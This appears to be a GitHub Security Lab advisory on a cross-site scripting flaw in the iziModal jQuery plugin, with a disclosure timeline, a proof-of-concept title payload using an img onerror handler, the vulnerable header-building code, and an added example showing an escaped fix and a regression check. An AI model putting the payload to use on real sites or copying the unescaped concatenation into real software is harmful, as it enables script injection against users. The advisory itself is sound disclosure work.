Coordinated Disclosure Timeline
- 2021-11-24: Maintainer contacted.
- 2022-04-12: Maintainer contacted.
- 2022-04-29: Public issue created asking for a security contact.
- 2022-05-26: Updated the public issue with our intention to publish the advisory due to the lack of response.
- 2022-05-30: Maintainer fixed the issue.
Summary
iziModal is prone to XSS when handling untrusted modal titles.
Product
iziModal
Tested Version
Details
An attacker who is able to influence the title field when creating an iziModal instance can supply arbitrary HTML or JavaScript code that will be rendered in the context of a user, potentially leading to XSS.
Proof of concept snippet:
$("#modal").iziModal({
    title: '<img src="foobar" onerror="alert(6)" />',
    subtitle: 'Blabity'
});
$(document).on('click', '.trigger', function (event) {
    event.preventDefault();
    $('#modal').iziModal('open');
});
Vulnerable code: iziModal.js
createHeader: function(){
    this.$header = $('<div class="'+PLUGIN_NAME+'-header"><h2 class="'+PLUGIN_NAME+'-header-title">' +
        this.options.title +
        '</h2><p class="'+PLUGIN_NAME+'-header-subtitle">' + this.options.subtitle +
        '</p><div class="'+PLUGIN_NAME+'-header-buttons"></div></div>');
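The following is an added example, not code from iziModal or from the advisory: the vulnerable header builder reduced to a pure function, a hardened variant that entity-escapes the untrusted title and subtitle before they are spliced into the markup, and a small regression check that counts tags the output contains beyond those of the template. The function names and the check are assumptions made for illustration.

```javascript
// Constant name taken from the advisory's excerpt; the value is assumed.
const PLUGIN_NAME = 'iziModal';

// Mirrors the vulnerable createHeader(): options.title is concatenated verbatim,
// so any markup in it is parsed as HTML when the string reaches jQuery.
function buildHeaderVulnerable(options) {
  return '<div class="' + PLUGIN_NAME + '-header"><h2 class="' + PLUGIN_NAME + '-header-title">' +
    options.title +
    '</h2><p class="' + PLUGIN_NAME + '-header-subtitle">' + options.subtitle +
    '</p><div class="' + PLUGIN_NAME + '-header-buttons"></div></div>';
}

// Minimal HTML entity escaping, safe for text nodes and double-quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened variant: same template, but user-controlled fields are escaped first.
// In a jQuery code base the equivalent is $('<h2>').text(options.title), which
// creates a text node instead of parsing the string as HTML.
function buildHeaderSafe(options) {
  return '<div class="' + PLUGIN_NAME + '-header"><h2 class="' + PLUGIN_NAME + '-header-title">' +
    escapeHtml(options.title) +
    '</h2><p class="' + PLUGIN_NAME + '-header-subtitle">' + escapeHtml(options.subtitle) +
    '</p><div class="' + PLUGIN_NAME + '-header-buttons"></div></div>';
}

// Counts opening and closing tags in a markup string.
function countTags(html) {
  return (html.match(/<[a-zA-Z\/]/g) || []).length;
}

// Regression check: how many tags in the rendered header did not come from the
// template itself? Anything above zero means caller-supplied input became markup.
function injectedTagCount(buildHeader, options) {
  return countTags(buildHeader(options)) - countTags(buildHeader({ title: '', subtitle: '' }));
}

// Constructed input: the payload from the advisory's proof of concept.
const pocOptions = { title: '<img src="foobar" onerror="alert(6)" />', subtitle: 'Blabity' };
console.log(injectedTagCount(buildHeaderVulnerable, pocOptions)); // 1
console.log(injectedTagCount(buildHeaderSafe, pocOptions));       // 0
```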
Impact
This issue may lead to XSS.
Resources
- Proof of concept
- https://github.com/marcelodolza/iziModal/issues/249
- https://github.com/marcelodolza/iziModal/commit/01728ac52bac5c1b4512087dafe0ad8b091fdc9e
Credit
This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1044 in any communication regarding this issue.